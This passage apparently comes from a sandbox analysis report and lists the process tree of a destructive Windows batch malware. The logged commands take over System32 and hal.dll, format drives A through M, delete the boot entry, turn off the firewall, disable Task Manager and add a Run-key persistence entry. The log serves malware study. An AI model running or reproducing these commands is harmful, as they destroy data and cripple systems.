    takeown /f "C:\Windows\System32\drivers" /r
    3⤵
    PID:3172
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\drivers" /reset /t /c /q
    3⤵
    PID:3412
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\drivers\*.*"
    3⤵
    - Views/modifies file attributes
    PID:3448
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:3740
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:2308
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:3480
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:1752
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:3920
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:2656
- - C:\Windows\system32\format.com
    format /y /q A:
    3⤵
    PID:3448
- - C:\Windows\system32\format.com
    format /y /q B:
    3⤵
    PID:4224
- - C:\Windows\system32\format.com
    format /y /q D:
    3⤵
    PID:4496
- - C:\Windows\system32\format.com
    format /y /q E:
    3⤵
    PID:4900
- - C:\Windows\system32\format.com
    format /y /q F:
    3⤵
    PID:1964
- - C:\Windows\system32\format.com
    format /y /q G:
    3⤵
    PID:5756
- - C:\Windows\system32\format.com
    format /y /q H:
    3⤵
    PID:5152
- - C:\Windows\system32\format.com
    format /y /q I:
    3⤵
    PID:2532
- - C:\Windows\system32\format.com
    format /y /q J:
    3⤵
    PID:2824
- - C:\Windows\system32\format.com
    format /y /q K:
    3⤵
    PID:6180
- - C:\Windows\system32\format.com
    format /y /q L:
    3⤵
    PID:6520
- - C:\Windows\system32\format.com
    format /y /q M:
    3⤵
    PID:6956
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
    3⤵
    PID:6520
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:1660
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
    3⤵
    PID:3028
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:7076
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
    3⤵
    PID:6464
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:6880
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\vbisurf.ax"
    3⤵
    PID:6984
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\vbisurf.ax" /reset /c /q
    3⤵
    PID:7620
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\vbisurf.ax"
    3⤵
    PID:4460
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\vidcap.ax"
    3⤵
    PID:4196
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\vidcap.ax" /reset /c /q
    3⤵
    - Modifies file permissions
    PID:9256
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\vidcap.ax"
    3⤵
    PID:10268
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\WSTPager.ax"
    3⤵
    PID:10908
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  PID:2680
- C:\Windows\system32\takeown.exe
  takeown /f "C:\Windows\System32\drivers" /r
  2⤵
  - Possible privilege escalation attempt
  - Suspicious use of AdjustPrivilegeToken
  PID:2336
- C:\Windows\system32\icacls.exe
  icacls "C:\Windows\System32\drivers" /reset /t /c /q
  2⤵
  - Possible privilege escalation attempt
  PID:904
- C:\Windows\system32\attrib.exe
  attrib -r -a -s -h "C:\Windows\System32\drivers\*.*"
  2⤵
  - Views/modifies file attributes
  PID:1368
- C:\Windows\system32\wscript.exe
  WScript ErrorCritico.vbs
  2⤵
  PID:580
- C:\Windows\system32\wscript.exe
  WScript Advertencia.vbs
  2⤵
  PID:908
- C:\Windows\system32\wscript.exe
  WScript ErrorCritico.vbs
  2⤵
  PID:1376
- C:\Windows\system32\wscript.exe
  WScript Advertencia.vbs
  2⤵
  PID:1096
- C:\Windows\system32\wscript.exe
  WScript ErrorCritico.vbs
  2⤵
  PID:944
- C:\Windows\system32\wscript.exe
  WScript Advertencia.vbs
  2⤵
  PID:560
- C:\Windows\system32\format.com
  format /y /q A:
  2⤵
  PID:2448
- C:\Windows\system32\format.com
  format /y /q B:
  2⤵
  PID:1664
- C:\Windows\system32\format.com
  format /y /q D:
  2⤵
  PID:2116
- C:\Windows\system32\format.com
  format /y /q E:
  2⤵
  PID:2324
- C:\Windows\system32\format.com
  format /y /q F:
  2⤵
  PID:2888
- C:\Windows\system32\format.com
  format /y /q G:
  2⤵
  PID:2832
- C:\Windows\system32\format.com
  format /y /q H:
  2⤵
  PID:2328
- C:\Windows\system32\format.com
  format /y /q I:
  2⤵
  PID:304
- C:\Windows\system32\format.com
  format /y /q J:
  2⤵
  PID:1084
- C:\Windows\system32\format.com
  format /y /q K:
  2⤵
  PID:1048
- C:\Windows\system32\format.com
  format /y /q L:
  2⤵
  PID:2644
- C:\Windows\system32\format.com
  format /y /q M:
  2⤵
  PID:3016
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
  2⤵
  PID:2588
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\hal.dll"
    3⤵
    PID:2268
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\hal.dll" /reset /c /q
    3⤵
    PID:1968
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\hal.dll"
    3⤵
    PID:2716
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\Twain_32.dll"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1044
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\Twain_32.dll" /reset /c /q
    3⤵
    PID:2592
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\Twain_32.dll"
    3⤵
    - Views/modifies file attributes
    PID:2232
- - C:\Windows\system32\reg.exe
    REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd" /f
    3⤵
    PID:1048
- - C:\Windows\system32\rundll32.exe
    rundll32 user32.dll, SwapMouseButton
    3⤵
    PID:3132
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:3968
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:4076
- - C:\Windows\system32\netsh.exe
    netsh advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:3424
- - C:\Windows\system32\bcdedit.exe
    bcdedit /delete {current}
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:4336
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K Taskdl.bat
    3⤵
    PID:4488
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32" /r
      4⤵
      Modifies file permissions
      PID:6388
- - C:\Windows\system32\wscript.exe
    WScript Informacion.vbs
    3⤵
    PID:4548
- - C:\Windows\system32\ipconfig.exe
    ipconfig /release
    3⤵
    - Gathers network information
    PID:4572
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h *.*
    3⤵
    - Views/modifies file attributes
    PID:4828
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:5032
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:4496
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:4972
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:1260
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:4208
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:4260
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:4156
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:4404
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:4412
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:4428
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
    3⤵
    PID:5092
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\hal.dll"
      4⤵
      Possible privilege escalation attempt
      PID:6424
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\hal.dll" /reset /c /q
      4⤵
      Modifies file permissions
      PID:6592
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h "C:\Windows\System32\hal.dll"
      4⤵
      PID:6924
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\Twain_32.dll"
      4⤵
      PID:7384
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\Twain_32.dll" /reset /c /q
      4⤵
      PID:7744
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h "C:\Windows\Twain_32.dll"
      4⤵
      Views/modifies file attributes
      PID:7912
  - - C:\Windows\system32\reg.exe
      REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd" /f
      4⤵
      PID:3908
  - - C:\Windows\system32\rundll32.exe
      rundll32 user32.dll, SwapMouseButton
      4⤵
      PID:7904
  - - C:\Windows\system32\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
      4⤵
      Modifies registry key
      PID:10908
  - - C:\Windows\system32\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
      4⤵
      Modifies registry key
      PID:10272
  - - C:\Windows\system32\netsh.exe
      netsh advfirewall set allprofiles state off
      4⤵
      Modifies Windows Firewall
      PID:11524
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:3632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
    3⤵
    PID:4932
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\hal.dll"
      4⤵
      PID:6776
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\hal.dll" /reset /c /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:7072
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h "C:\Windows\System32\hal.dll"
      4⤵
      PID:6424
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\Twain_32.dll"
      4⤵
      PID:7512
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\Twain_32.dll" /reset /c /q
      4⤵
      PID:7936
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h "C:\Windows\Twain_32.dll"
      4⤵
      PID:8072
  - - C:\Windows\system32\reg.exe
      REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd" /f
      4⤵
      PID:7376
  - - C:\Windows\system32\rundll32.exe
      rundll32 user32.dll, SwapMouseButton
      4⤵
      PID:4444
  - - C:\Windows\system32\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
      4⤵
      Modifies registry key
      PID:10472
  - - C:\Windows\system32\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
      4⤵
      Modifies registry key
      PID:11352
  - - C:\Windows\system32\netsh.exe
      netsh advfirewall set allprofiles state off
      4⤵
      Modifies Windows Firewall
      PID:12088
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:4960
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
    3⤵
    PID:5096
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\hal.dll"
      4⤵
      PID:6732
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\hal.dll" /reset /c /q
      4⤵
      Possible privilege escalation attempt
      PID:1600
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h "C:\Windows\System32\hal.dll"
      4⤵
      PID:6432
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\Twain_32.dll"
      4⤵
      PID:7172
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\Twain_32.dll" /reset /c /q
      4⤵
      PID:7628
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h "C:\Windows\Twain_32.dll"
      4⤵
      Views/modifies file attributes
      PID:7776
  - - C:\Windows\system32\reg.exe
      REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd" /f
      4⤵
      PID:6924
  - - C:\Windows\system32\rundll32.exe
      rundll32 user32.dll, SwapMouseButton
      4⤵
      PID:4040
  - - C:\Windows\system32\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
      4⤵
      Modifies registry key
      PID:10612
  - - C:\Windows\system32\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
      4⤵
      Modifies registry key
      PID:11068
  - - C:\Windows\system32\netsh.exe
      netsh advfirewall set allprofiles state off
      4⤵
      Modifies Windows Firewall
      PID:10720
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:4416
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\drivers" /r
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:5164
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\drivers" /reset /t /c /q
    3⤵
    - Possible privilege escalation attempt
    PID:5476
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\drivers\*.*"
    3⤵
    - Views/modifies file attributes
    PID:5568
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:5876
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:5888
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:5912
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:5928
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:5944
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:5968
- - C:\Windows\system32\format.com
    format /y /q A:
    3⤵
    PID:6044
- - C:\Windows\system32\format.com
    format /y /q B:
    3⤵
    PID:5764
- - C:\Windows\system32\format.com
    format /y /q D:
    3⤵
    PID:4396
- - C:\Windows\system32\format.com
    format /y /q E:
    3⤵
    PID:2480
- - C:\Windows\system32\format.com
    format /y /q F:
    3⤵
    PID:2240
- - C:\Windows\system32\format.com
    format /y /q G:
    3⤵
    PID:6196
- - C:\Windows\system32\format.com
    format /y /q H:
    3⤵
    PID:6556
- - C:\Windows\system32\format.com
    format /y /q I:
    3⤵
    PID:6984
- - C:\Windows\system32\format.com
    format /y /q J:
    3⤵
    PID:804
- - C:\Windows\system32\format.com
    format /y /q K:
    3⤵
    PID:6764
- - C:\Windows\system32\format.com
    format /y /q L:
    3⤵
    PID:7856
- - C:\Windows\system32\format.com
    format /y /q M:
    3⤵
    PID:3856
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
    3⤵
    PID:5052
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:7740
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
    3⤵
    PID:4796
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:7280
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
    3⤵
    PID:7312
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:7592
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\vidcap.ax"
    3⤵
    - Possible privilege escalation attempt
    PID:7288
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\vidcap.ax" /reset /c /q
    3⤵
    - Possible privilege escalation attempt
    PID:8296
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\vidcap.ax"
    3⤵
    - Views/modifies file attributes
    PID:9432
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\DriverStore\FileRepository\averfx2hbtv_x64.inf_amd64_neutral_7216b6fb23536c40\MVDetection64.ax"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:10648
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  PID:2764
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
  2⤵
  PID:2632
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\hal.dll"
    3⤵
    PID:1720
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\hal.dll" /reset /c /q
    3⤵
    - Modifies file permissions
    PID:1996
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\hal.dll"
    3⤵
    - Views/modifies file attributes
    PID:864
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\Twain_32.dll"
    3⤵
    - Modifies file permissions
    PID:2780
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\Twain_32.dll" /reset /c /q
    3⤵
    PID:2324
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\Twain_32.dll"
    3⤵
    - Views/modifies file attributes
    PID:2604
- - C:\Windows\system32\reg.exe
    REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd" /f
    3⤵
    PID:2988
- - C:\Windows\system32\rundll32.exe
    rundll32 user32.dll, SwapMouseButton
    3⤵
    PID:1484
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:324
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:3112
- - C:\Windows\system32\netsh.exe
    netsh advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:3180
- - C:\Windows\system32\bcdedit.exe
    bcdedit /delete {current}
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:2284
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K Taskdl.bat
    3⤵
    PID:3600
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32" /r
      4⤵
      PID:5132
- - C:\Windows\system32\wscript.exe
    WScript Informacion.vbs
    3⤵
    PID:2756
- - C:\Windows\system32\ipconfig.exe
    ipconfig /release
    3⤵
    - Gathers network information
    PID:3836
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h *.*
    3⤵
    - Views/modifies file attributes
    PID:3596
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:3608
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:4296
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:4312
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:4320
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:4328
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:4344
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:4352
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:4360
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:4368
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:4380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
    3⤵
    PID:4448
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\hal.dll"
      4⤵
      PID:6168
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\hal.dll" /reset /c /q
      4⤵
      PID:6396
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h "C:\Windows\System32\hal.dll"
      4⤵
      Views/modifies file attributes
      PID:6456
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\Twain_32.dll"
      4⤵
      PID:6596
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\Twain_32.dll" /reset /c /q
      4⤵
      Possible privilege escalation attempt
      PID:6720
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h "C:\Windows\Twain_32.dll"
      4⤵
      Views/modifies file attributes
      PID:6864
  - - C:\Windows\system32\reg.exe
      REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd" /f
      4⤵
      PID:6592
  - - C:\Windows\system32\rundll32.exe
      rundll32 user32.dll, SwapMouseButton
      4⤵
      PID:6664
  - - C:\Windows\system32\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
      4⤵
      Modifies registry key
      PID:8032
  - - C:\Windows\system32\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
      4⤵
      Modifies registry key
      PID:8312
  - - C:\Windows\system32\netsh.exe
      netsh advfirewall set allprofiles state off
      4⤵
      Modifies Windows Firewall
      PID:5200
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /delete {current}
      4⤵
      Modifies boot configuration data using bcdedit
      PID:11980
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:4480
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
    3⤵
    PID:4520
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\hal.dll"
      4⤵
      Modifies file permissions
      PID:6284
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\hal.dll" /reset /c /q
      4⤵
      Possible privilege escalation attempt
      PID:6492
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h "C:\Windows\System32\hal.dll"
      4⤵
      Views/modifies file attributes
      PID:6508
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\Twain_32.dll"
      4⤵
      Possible privilege escalation attempt
      PID:6676
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\Twain_32.dll" /reset /c /q
      4⤵
      PID:6876
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h "C:\Windows\Twain_32.dll"
      4⤵
      Views/modifies file attributes
      PID:6964
  - - C:\Windows\system32\reg.exe
      REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd" /f
      4⤵
      PID:4444
  - - C:\Windows\system32\rundll32.exe
      rundll32 user32.dll, SwapMouseButton
      4⤵
      PID:6600
  - - C:\Windows\system32\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
      4⤵
      Modifies registry key
      PID:7388
  - - C:\Windows\system32\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
      4⤵
      Modifies registry key
      PID:8616
  - - C:\Windows\system32\netsh.exe
      netsh advfirewall set allprofiles state off
      4⤵
      Modifies Windows Firewall
      PID:8988
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:4528
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
    3⤵
    PID:4540
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\hal.dll"
      4⤵
      Modifies file permissions
      PID:5180
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\hal.dll" /reset /c /q
      4⤵
      Modifies file permissions
      PID:6224
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h "C:\Windows\System32\hal.dll"
      4⤵
      PID:6304
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\Twain_32.dll"
      4⤵
      PID:6472
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\Twain_32.dll" /reset /c /q
      4⤵
      Possible privilege escalation attempt
      PID:6580
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h "C:\Windows\Twain_32.dll"
      4⤵
      Views/modifies file attributes
      PID:6640
  - - C:\Windows\system32\reg.exe
      REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd" /f
      4⤵
      PID:7068
  - - C:\Windows\system32\rundll32.exe
      rundll32 user32.dll, SwapMouseButton
      4⤵
      PID:7016
  - - C:\Windows\system32\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
      4⤵
      Modifies registry key
      PID:7872
  - - C:\Windows\system32\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
      4⤵
      Modifies registry key
      PID:7384
  - - C:\Windows\system32\netsh.exe
      netsh advfirewall set allprofiles state off
      4⤵
      Modifies Windows Firewall
      PID:8388
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /delete {current}
      4⤵
      Modifies boot configuration data using bcdedit
      PID:11480
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K Taskdl.bat
      4⤵
      PID:11776
  - - C:\Windows\system32\wscript.exe
      WScript Informacion.vbs
      4⤵
      PID:11828
  - - C:\Windows\system32\ipconfig.exe
      ipconfig /release
      4⤵
      Gathers network information
      PID:11884
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:4556
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\drivers" /r
    3⤵
    PID:4564
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\drivers" /reset /t /c /q
    3⤵
    PID:4664
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\drivers\*.*"
    3⤵
    PID:4696
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:4844
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:4852
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:4872
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:4892
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:4912
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:4920
- - C:\Windows\system32\format.com
    format /y /q A:
    3⤵
    PID:5004
- - C:\Windows\system32\format.com
    format /y /q B:
    3⤵
    PID:4252
- - C:\Windows\system32\format.com
    format /y /q D:
    3⤵
    PID:5584
- - C:\Windows\system32\format.com
    format /y /q E:
    3⤵
    PID:5324
- - C:\Windows\system32\format.com
    format /y /q F:
    3⤵
    PID:6092
- - C:\Windows\system32\format.com
    format /y /q G:
    3⤵
    PID:4968
- - C:\Windows\system32\format.com
    format /y /q H:
    3⤵
    PID:4960
- - C:\Windows\system32\format.com
    format /y /q I:
    3⤵
    PID:6464
- - C:\Windows\system32\format.com
    format /y /q J:
    3⤵
    PID:6744
